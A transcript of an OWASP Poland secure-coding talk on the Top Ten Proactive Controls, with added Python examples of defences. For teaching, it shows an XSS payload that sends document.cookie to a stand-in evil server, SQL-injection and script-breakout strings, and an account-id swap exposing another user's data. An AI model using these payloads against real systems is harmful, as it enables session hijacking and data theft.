Ten Commandments of Secure Coding
TRANSCRIPT
![Page 1: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/1.jpg)
Ten Commandments of Secure Coding
OWASP Top Ten Proactive Controls
Mateusz Olejarka
OWASP Poland
![Page 2: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/2.jpg)
Mateusz Olejarka @molejarka
• Senior IT Security Consultant @SecuRing
• Ex-developer
• OWASP Poland since 2011
![Page 3: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/3.jpg)
OWASP: O = Open
• Docs & tools
– free
– Creative Commons license
– open source
• Built with open collaboration in mind
– Each one of you can join
![Page 4: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/4.jpg)
OWASP Poland Chapter
• Since 2007
• Meetings: Kraków, Poznań, Warszawa
• Free entry
• Supporters:
![Page 5: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/5.jpg)
4Developers 2014* questionnaire
* SecuRing's study „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014” (Secure software development practices in Polish companies – 2014)
• 62% of companies do not educate programmers on application security
• >50% of companies do not consider security during the design stage
• 73% of participants confirmed that they had fixed security-related issues
• only 42% confirmed that they do security testing before production deployment
![Page 6: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/6.jpg)
OWASP Top 10 Risks vs OWASP Top 10 Proactive Controls
![Page 7: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/7.jpg)
Disclaimer
• Do not base your application security on the Top 10 alone*
– It is purely educational material
– Each application has its own risk profile
![Page 8: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/8.jpg)
Thou shalt parametrize queries
1: Parametrize queries
![Page 9: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/9.jpg)
SQL/LDAP/XML/cmd/…-injection
#1 in the OWASP Top 10
• Easily exploitable
• Simple-to-use tools exist
• Devastating impact
Source: http://xkcd.com/327/
![Page 10: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/10.jpg)
Best practices
#1 Prepared Statements / Parametrized Queries
#2 Stored Procedures
– Watch for exceptions! (eval, dynamic blocks, etc.)
#3 Escaping
– risky!

    String newName = request.getParameter("newName");
    String id = request.getParameter("id");
    // Placeholders keep user input out of the SQL text; the driver sends it as typed data
    PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
    pstmt.setString(1, newName);
    pstmt.setString(2, id);
    pstmt.executeUpdate();
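The same UPDATE as on the slide, as an added example that is not part of the original deck or of OWASP material: a string-concatenated version beside a parameterized one, run against a constructed in-memory SQLite table. The employee names and the database are assumptions made for the demo; the `Robert'); DROP TABLE EMPLOYEES;--` name is the xkcd 327 reference the slide cites, and with a bound parameter it is stored as a literal string.

```python
import sqlite3

# Constructed sample database with the EMPLOYEES table the slide's UPDATE targets.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE EMPLOYEES (ID INTEGER PRIMARY KEY, NAME TEXT NOT NULL)")
    conn.executemany("INSERT INTO EMPLOYEES VALUES (?, ?)", [(1, "Alice"), (2, "Bob")])
    conn.commit()
    return conn

def rename_employee_unsafe(conn: sqlite3.Connection, emp_id: int, new_name: str) -> str:
    # String concatenation: the value becomes part of the SQL text. Even an honest
    # name with an apostrophe changes the statement's structure and breaks parsing,
    # which is exactly the property an injection payload abuses.
    sql = "UPDATE EMPLOYEES SET NAME = '" + new_name + "' WHERE ID = " + str(emp_id)
    try:
        conn.execute(sql)
        conn.commit()
        return "ok"
    except sqlite3.OperationalError as why:
        return "sql error: " + str(why)

def rename_employee_safe(conn: sqlite3.Connection, emp_id: int, new_name: str) -> str:
    # Parameterized query: the SQL text is constant and the values are bound
    # separately as data, so quotes, semicolons and comment markers in them
    # have no SQL meaning.
    conn.execute("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?", (new_name, emp_id))
    conn.commit()
    return "ok"

def employee_names(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT NAME FROM EMPLOYEES ORDER BY ID")]

def table_exists(conn: sqlite3.Connection, name: str) -> bool:
    row = conn.execute(
        "SELECT COUNT(*) FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row[0] == 1

# The xkcd 327 name the slide cites; bound as a parameter it is just a string.
BOBBY_TABLES = "Robert'); DROP TABLE EMPLOYEES;--"

if __name__ == "__main__":
    db = make_db()
    print(rename_employee_unsafe(db, 1, "O'Brien"))   # sql error: the quote was parsed as SQL
    print(rename_employee_safe(db, 1, "O'Brien"))     # ok
    print(rename_employee_safe(db, 2, BOBBY_TABLES))  # ok, and EMPLOYEES is still there
    print(employee_names(db), table_exists(db, "EMPLOYEES"))
```

The unsafe variant fails on a perfectly legitimate Irish surname; that failure is the tell that user data has reached the SQL parser, and it is the same mechanism the slide's "easily exploitable" line refers to.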
![Page 11: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/11.jpg)
References
• Bobby Tables: A guide to preventing SQL injection
• Query Parameterization Cheat Sheet
• SQL Injection Prevention Cheat Sheet
• OWASP Secure Coding Practices Quick Reference Guide
![Page 12: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/12.jpg)
2: Thou shalt encode data
2: Encode Data
![Page 13: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/13.jpg)
XSS
• Site defacement
• Session hijacking
<script>document.body.innerHTML = "Jim was here";</script>
<script>var img = new Image(); img.src = "http://<some evil server>.com?" + document.cookie;</script>
![Page 14: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/14.jpg)
Results of missing encoding
• Session hijacking
• Network scanning
• CSRF prevention bypass
• Site defacement (browser)
• …
• Browser hijack
– see BeEF
![Page 15: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/15.jpg)
![Page 16: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/16.jpg)
Cross Site Scripting
But when we write output inside pure JavaScript:

<script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script>

With the input trn_recipient=';alert('xss');-- the page renders as:

<script> var split='';alert('xss');--
![Page 17: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/17.jpg)
Best practices
• Special character encoding has to be context aware
– HTML element
– HTML attribute
– JavaScript
– JSON
– CSS / style
– URL
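Context-aware encoders for the contexts listed on the slide, as an added example written for this page (not code from the deck, the OWASP Java Encoder or ESAPI). The `render_recipient_script` template mirrors the slide's `var split='...'` snippet; the assumption is that the encoder for the JavaScript-string context turns every non-alphanumeric character into a `\uXXXX` escape, which is the conservative rule the OWASP XSS Prevention Cheat Sheet describes for that context.

```python
import html
import json
from urllib.parse import quote

def encode_for_html_element(value: str) -> str:
    # Between tags (<div>VALUE</div>): neutralize everything that could open a tag or entity.
    return html.escape(value, quote=True)

def encode_for_html_attribute(value: str) -> str:
    # Inside a quoted attribute (<input value="VALUE">): same character set, and the
    # attribute must always be quoted for this to be sufficient.
    return html.escape(value, quote=True)

def encode_for_js_string(value: str) -> str:
    # Inside a JavaScript string literal (var split='VALUE'): every character that is
    # not [A-Za-z0-9] becomes \uXXXX, so a quote, ';', '<' or '/' can neither end the
    # literal nor the <script> block. Characters outside the BMP become two escapes.
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
            continue
        units = ch.encode("utf-16-be")
        for i in range(0, len(units), 2):
            out.append("\\u%04x" % int.from_bytes(units[i:i + 2], "big"))
    return "".join(out)

def encode_for_json_in_script(value) -> str:
    # JSON embedded in a <script>: json.dumps escapes quotes and control characters
    # but not '<', so a "</script>" inside a string has to be neutralized separately.
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))

def encode_for_url_parameter(value: str) -> str:
    # Query-string value (?q=VALUE): percent-encode everything except unreserved characters.
    return quote(value, safe="")

def render_recipient_script(recipient: str) -> str:
    # The slide's template, with the value encoded for the JavaScript-string context.
    return ("<script> var split='" + encode_for_js_string(recipient)
            + "'; splitRecipient(split); </script>")

if __name__ == "__main__":
    print(render_recipient_script("';alert('xss');--"))
    print(encode_for_html_element("<b>x</b>"))
    print(encode_for_json_in_script("</script>"))
```

The point the slide makes is that one encoder does not fit all contexts: `html.escape` would leave `';alert('xss');--` intact inside a JavaScript string, and the JavaScript encoder would be wrong inside a URL parameter. Pick the encoder by where the output lands, not by where the input came from.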
![Page 18: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/18.jpg)
References
• XSS (Cross Site Scripting) Prevention Cheat Sheet
• Java Encoder Project
• Microsoft .NET AntiXSS Library
• OWASP ESAPI
• Encoder Comparison Reference Project
![Page 19: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/19.jpg)
Thou shalt validate all inputs
3: Validate All Inputs
![Page 20: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/20.jpg)
Why validate anything?
• Most other vulnerabilities (e.g. injections, XSS, …) also stem from missing input validation
• Validation is like a firewall
– It does not protect you against everything
– …but it is nice to have
![Page 21: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/21.jpg)
Best practices
• Prefer a whitelist over a blacklist approach
• Use strongly typed fields
– One validator per data type
– Easier to integrate a WAF
• Validation = first line of defence
– For example, type casting prevents injection
– But not the only one!
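Whitelist validation with one validator per data type, as an added example for this page (not code from the deck or from Apache Commons Validator). It parses a constructed transfer form into a strongly typed record; the account format is the 26-digit form used in the slide's account-history example, and the amount, date and title rules are assumptions for the demo.

```python
import re
from dataclasses import dataclass
from datetime import date
from decimal import Decimal

class ValidationError(ValueError):
    """Carries the name of the offending field; the caller decides how to report it."""

# Whitelists: say what is allowed, never try to enumerate what is forbidden.
ACCOUNT_RE = re.compile(r"[0-9]{26}")                 # 26-digit account number, as on the slide
AMOUNT_RE = re.compile(r"[0-9]{1,12}(\.[0-9]{1,2})?")  # constructed rule: up to 2 decimals
TITLE_RE = re.compile(r"[A-Za-z0-9 .,/-]{1,140}")      # constructed rule: transfer title charset

@dataclass(frozen=True)
class TransferRequest:
    account: str
    amount: Decimal
    booking_date: date
    title: str

def validate_account(raw: str) -> str:
    if not ACCOUNT_RE.fullmatch(raw):
        raise ValidationError("account")
    return raw

def validate_amount(raw: str) -> Decimal:
    if not AMOUNT_RE.fullmatch(raw):
        raise ValidationError("amount")
    value = Decimal(raw)
    if value <= 0:
        raise ValidationError("amount")
    return value

def validate_date(raw: str) -> date:
    # Type cast as validation: anything that is not a real calendar date is rejected.
    try:
        return date.fromisoformat(raw)
    except ValueError:
        raise ValidationError("date") from None

def validate_title(raw: str) -> str:
    if not TITLE_RE.fullmatch(raw):
        raise ValidationError("title")
    return raw

def parse_transfer(form: dict) -> TransferRequest:
    # One validator per data type; downstream code only ever sees typed values.
    # A missing field is invalid input, not a default.
    try:
        return TransferRequest(
            account=validate_account(form["account"]),
            amount=validate_amount(form["amount"]),
            booking_date=validate_date(form["date"]),
            title=validate_title(form["title"]),
        )
    except KeyError as missing:
        raise ValidationError(str(missing)) from None

def is_valid(form: dict) -> bool:
    try:
        parse_transfer(form)
        return True
    except ValidationError:
        return False

if __name__ == "__main__":
    sample = {"account": "85101022350445200448009906", "amount": "100.50",
              "date": "2014-04-07", "title": "Invoice 12/2014"}
    print(parse_transfer(sample))
    print(is_valid(dict(sample, account="85101022350445200448009906'--")))  # False
```

This is the "firewall" from the previous slide in code: a validator rejects inputs that could never be legitimate, which removes whole classes of malformed data before they reach a query or a template, but the parameterized query and the output encoder stay in place regardless.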
![Page 22: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/22.jpg)
References
• Input Validation Cheat Sheet
• Apache Commons Validator
• OWASP JSON Sanitizer Project
• OWASP Java HTML Sanitizer Project
• Google Caja
![Page 23: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/23.jpg)
Thou shalt implement appropriate access controls
4: Implement Appropriate Access Controls
![Page 24: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/24.jpg)
Account history
![Page 25: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/25.jpg)
HTTP request:

GET /services/history/account/85101022350445200448009906 HTTP/1.1
SA-DeviceId: 940109f08ba56a89
SA-SessionId: 826175
Accept: application/json
Host: acc
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Same session, different account id:

GET /services/history/account/45101022350445200448005388 HTTP/1.1
SA-DeviceId: 940109f08ba56a89
SA-SessionId: 826175
Accept: application/json
Host: acc
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Account id change – we get another user's data
![Page 26: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/26.jpg)
Best practices
• The server makes the final call!
• Default deny
• All requests must go through access control
– centralized, easy-to-use mechanism
• Access control rules (policy) should be separated from code
– Not a part of it
![Page 27: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/27.jpg)
// Role-based check: the role name is hard-coded into application logic
if (currentUser.hasRole("administrator")) {
    // allow
} else {
    // deny
}

// Permission-based check: who may print is decided by the policy, not the code
if (currentUser.isPermitted(printPermission)) {
    // allow
} else {
    // deny
}
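A centralized, default-deny authorization check for the account-history service from the previous slides, as an added example for this page (not the deck's code and not Apache Shiro). The role/permission table, the session table and the account ownership table are constructed sample data kept outside the request handler, which is the "policy separated from code" point; the ownership comparison is the check the slide's service was missing.

```python
import re

# --- Policy and reference data (constructed samples), kept out of request-handling code ---
ROLE_PERMISSIONS = {
    "customer": {"account:read"},
    "clerk": {"account:read", "report:print"},
    "administrator": {"account:read", "report:print", "user:manage"},
}
SESSIONS = {"826175": "alice"}                      # SA-SessionId -> authenticated user
USER_ROLES = {"alice": {"customer"}, "bob": {"customer"}}
ACCOUNT_OWNERS = {
    "85101022350445200448009906": "alice",
    "45101022350445200448005388": "bob",
}

class AccessDenied(PermissionError):
    pass

def is_permitted(user: str, permission: str) -> bool:
    # Permission lookup goes through the policy table; role names never appear in code.
    return any(permission in ROLE_PERMISSIONS.get(role, ())
               for role in USER_ROLES.get(user, ()))

def authorize(session_id: str, permission: str, account_id: str = None) -> str:
    # Single choke point for every request. Anything not explicitly allowed is denied.
    user = SESSIONS.get(session_id)
    if user is None:
        raise AccessDenied("no valid session")
    if not is_permitted(user, permission):
        raise AccessDenied("missing permission " + permission)
    if account_id is not None and ACCOUNT_OWNERS.get(account_id) != user:
        # Object-level check: the requested account must belong to the caller.
        raise AccessDenied("account not owned by caller")
    return user

HISTORY_PATH = re.compile(r"/services/history/account/([0-9]{26})")

def handle_request(path: str, headers: dict) -> tuple:
    # Returns (status, body). The server decides; nothing the client sent is trusted.
    match = HISTORY_PATH.fullmatch(path)
    if match is None:
        return 404, "not found"
    account_id = match.group(1)
    try:
        user = authorize(headers.get("SA-SessionId", ""), "account:read", account_id)
    except AccessDenied as why:
        return 403, "forbidden: " + str(why)
    return 200, "history of %s for %s" % (account_id, user)

if __name__ == "__main__":
    session = {"SA-SessionId": "826175"}
    print(handle_request("/services/history/account/85101022350445200448009906", session))  # 200
    print(handle_request("/services/history/account/45101022350445200448005388", session))  # 403
```

With the ownership check in `authorize`, the second request from the slide (same session, someone else's account id) is refused, and because every path runs through the same function there is no endpoint that forgets to ask.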
![Page 28: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/28.jpg)
References
• Access Control Cheat Sheet
• Java Authorization Guide with Apache Shiro
– Apache Shiro Authorization features
• OWASP PHPRBAC Project
![Page 29: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/29.jpg)
Thou shalt establish identity and authentication controls
5: Establish Identity and Authentication Controls
![Page 30: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/30.jpg)
Example vulnerability
• Authentication with locally stored key (on the machine)
• Process:
1. Enter login
2. Select key file, enter key password
3. We are logged in
https://...../GenerateNewKey
![Page 31: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/31.jpg)
Best practices
• Check access control for the functions that allow changing authentication credentials
• „chain of trust” rule
• Watch for the session at the border!
• Do not limit the length or the characters allowed in passwords
![Page 32: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/32.jpg)
References
• Authentication Cheat Sheet
• Password Storage Cheat Sheet
• Forgot Password Cheat Sheet
• Session Management Cheat Sheet
![Page 33: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/33.jpg)
Thou shalt protect data and privacy
6: Protect Data and Privacy
![Page 34: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/34.jpg)
Example (in transit)
• SSL covers encryption and authentication
• What verifies the server's identity?
– Web applications: the browser
– Mobile / thick-client / embedded… applications: the application itself
• Common errors
– Missing certificate validation
– No check of the certificate or of the „chain of trust”
– Missing exception handling
![Page 35: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/35.jpg)
Best practices (in transit)
• TLS
• For the whole application
• Cookies: „Secure” flag
• HTTP Strict Transport Security
• Strong cipher suites
• Chain of trust
• Certificate pinning
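The client-side half of the two previous slides, as an added example for this page (not from the deck or O-Saft): the weak TLS context beside the correct one, a check a test suite can run against whichever context the application really uses, a connect function whose verification failure is reported rather than swallowed, and the HSTS header and Secure cookie from the best-practices list. Certificate pinning is not shown. Host names, cookie names and the max-age value are assumptions.

```python
import socket
import ssl

def secure_client_context() -> ssl.SSLContext:
    # The correct starting point: trusted CA store loaded, certificate and chain
    # verified, hostname checked, old protocol versions refused.
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx

def insecure_client_context() -> ssl.SSLContext:
    # The "common error": a certificate problem "fixed" by switching verification off.
    # The connection is still encrypted, but to whoever answers, not to the real server.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx

def context_is_safe(ctx: ssl.SSLContext) -> bool:
    # Worth asserting in a test against the context the application really uses.
    return bool(ctx.check_hostname
                and ctx.verify_mode == ssl.CERT_REQUIRED
                and ctx.minimum_version >= ssl.TLSVersion.TLSv1_2)

def probe_tls(host: str, port: int = 443, timeout: float = 5.0) -> tuple:
    # Exception handling: a failed verification is reported, never caught and ignored.
    ctx = secure_client_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return ("ok", tls.version())
    except ssl.SSLCertVerificationError as why:
        return ("certificate rejected", str(why))
    except (ssl.SSLError, OSError) as why:
        return ("connection failed", str(why))

def hsts_header(max_age: int = 31536000) -> tuple:
    # HTTP Strict Transport Security: the browser remembers to use TLS only (value assumed).
    return ("Strict-Transport-Security", "max-age=%d; includeSubDomains" % max_age)

def session_cookie(value: str) -> str:
    # Secure keeps the session cookie off plaintext HTTP; HttpOnly keeps it away from scripts.
    return "SESSIONID=%s; Path=/; Secure; HttpOnly; SameSite=Strict" % value

if __name__ == "__main__":
    print(context_is_safe(secure_client_context()), context_is_safe(insecure_client_context()))
    print(hsts_header())
    print(session_cookie("example-session-id"))
```

`insecure_client_context` is the shape that "missing certificate validation" usually takes in mobile and thick-client code; the fact that it connects without error is exactly the problem, which is why `context_is_safe` inspects the configuration instead of trusting a successful handshake.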
![Page 36: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/36.jpg)
References (in transit)
• Transport Layer Protection Cheat Sheet
• Pinning Cheat Sheet
• OWASP O-Saft (SSL Audit for Testers)
![Page 37: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/37.jpg)
Example (at rest)
• Storing passwords
• „Own” SHA1 function

    // "Own SHA1": in fact a fixed-key XOR printed as hex, which is reversible and not a hash at all
    private static final byte[] key = "secret".getBytes();                    // not shown on the slide; constructed stand-in
    private static final char[] hexDigit = "0123456789abcdef".toCharArray();  // not shown on the slide

    public static String encrypt(byte[] in) {
        String out = "";
        for (int i = 0; i < in.length; i++) {
            byte b = (byte) (in[i] ^ key[i % key.length]);
            out += "" + hexDigit[(b & 0xf0) >> 4] + hexDigit[b & 0x0f];
        }
        return out;
    }
![Page 38: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/38.jpg)
Best practices (at rest)
• Do not reinvent the wheel!
– Home-bred ciphers are evil
– Own crypto is evil
– Only libraries with a reputation!
• Strong ciphers in strong modes
– ECB is evil
– CBC – watch for „padding oracle”
• Good RNG for IV
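Password storage done as these slides (and the authentication slide's "do not limit length and characters") ask, as an added example for this page rather than code from the deck, KeyCzar or the cheat sheets. The first two functions reproduce the slide's XOR "encrypt" to show that it is invertible, so anyone holding the table and the key holds every password; the rest uses PBKDF2-HMAC-SHA256 from the standard library with a random salt and a constant-time compare. The XOR key is a constructed stand-in, and the iteration count follows the current OWASP Password Storage Cheat Sheet recommendation.

```python
import hashlib
import hmac
import secrets
import unicodedata

# --- The slide's "own SHA1", reproduced: XOR with a fixed key, rendered as hex ---
XOR_KEY = b"s3cret"   # constructed stand-in for the key array the slide does not show

def xor_hex(data: bytes, key: bytes = XOR_KEY) -> str:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).hex()

def xor_unhex(hexstr: str, key: bytes = XOR_KEY) -> bytes:
    # The same operation inverts it: this is (weak) encryption, not a hash.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(bytes.fromhex(hexstr)))

# --- A real password hash: salted, slow, from a reputable implementation (OpenSSL via hashlib) ---
ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000   # OWASP Password Storage Cheat Sheet figure for PBKDF2-HMAC-SHA256

def _to_bytes(password: str) -> bytes:
    # No length cap and no character restrictions: normalize, encode, done.
    return unicodedata.normalize("NFKC", password).encode("utf-8")

def hash_password(password: str) -> str:
    salt = secrets.token_bytes(16)   # CSPRNG, a fresh salt per password
    digest = hashlib.pbkdf2_hmac("sha256", _to_bytes(password), salt, ITERATIONS)
    return "$".join([ALGORITHM, str(ITERATIONS), salt.hex(), digest.hex()])

def verify_password(password: str, stored: str) -> bool:
    try:
        algorithm, iterations, salt_hex, digest_hex = stored.split("$")
        if algorithm != ALGORITHM:
            return False
        candidate = hashlib.pbkdf2_hmac("sha256", _to_bytes(password),
                                        bytes.fromhex(salt_hex), int(iterations))
        # Constant-time comparison so a mismatch cannot be timed byte by byte.
        return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))
    except ValueError:
        return False   # malformed record: deny, do not crash

if __name__ == "__main__":
    print(xor_unhex(xor_hex(b"hunter2")))            # b'hunter2' comes straight back
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))   # True
    print(verify_password("wrong", record))                           # False
```

Storing the algorithm name and iteration count beside the salt and digest is what lets the count be raised later without locking anyone out: old records still verify with their own parameters and can be re-hashed at the next successful login.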
![Page 39: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/39.jpg)
References
• Google KeyCzar
• Cryptographic Storage Cheat Sheet
• Password Storage Cheat Sheet
![Page 40: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/40.jpg)
Thou shalt implement logging, error handling and intrusion detection
7: Implement Logging, Error Handling and Intrusion Detection
![Page 41: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/41.jpg)
References
• Logging Cheat Sheet
• OWASP AppSensor Project
![Page 42: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/42.jpg)
Thou shalt leverage security features of frameworks and security libraries
8: Leverage Security Features of Frameworks and Security Libraries
![Page 43: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/43.jpg)
References
• PHP Security Cheat Sheet
• .NET Security Cheat Sheet
• Spring Security
• Apache Shiro
• OWASP Dependency Check / Track
![Page 44: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/44.jpg)
Thou shalt include security-specific requirements
9: Include Security-Specific Requirements
![Page 45: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/45.jpg)
Building requirements
• Attack scenarios
– How can threats reach their objectives?
– Requires experience and expertise
• Selection of security controls == REQUIREMENTS
[Diagram: Threat (Who?) → Attack scenarios (How?) → Results (What?)]
![Page 46: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/46.jpg)
References
• OWASP Application Security Verification Standard Project
• Software Assurance Maturity Model
• Business Logic Security Cheat Sheet
• Testing for business logic (OWASP-BL-001)
![Page 47: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/47.jpg)
Thou shalt design and architect security in
10: Design and Architect Security In
![Page 48: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/48.jpg)
References
• Software Assurance Maturity Model (OpenSAMM)
• Application Security Verification Standard Project
• Application Security Architecture Cheat Sheet
• Attack Surface Analysis Cheat Sheet
• Threat Modeling Cheat Sheet
![Page 49: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/49.jpg)
Summary
![Page 50: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/50.jpg)
That was just the Top Ten!
• Each application is different
– The risk profile should be defined (WHO? WHY?)
– Consider „compliance with existing regulations”
• A few easy steps with a big positive impact
• Developer education is worth it!
![Page 51: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/51.jpg)
OWASP meetings
• https://www.owasp.org/index.php/Poland
• Mailing list
• Facebook: OWASP Poland Local Chapter
• Twitter: @owasppoland